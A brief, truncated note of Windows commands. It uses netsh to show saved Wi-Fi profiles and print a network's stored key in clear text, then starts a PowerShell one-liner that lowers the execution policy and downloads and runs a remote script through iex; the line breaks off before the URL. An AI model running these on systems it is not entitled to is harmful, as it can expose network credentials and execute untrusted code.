Open CMD
netsh wlan show profile
netsh wlan show profile name = "ENTER NETWORK NAME HERE" key=clear | find "Key Content"
Run PowerShell as Admin Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process iex ((New-Object System.Net.WebClient).DownloadStri...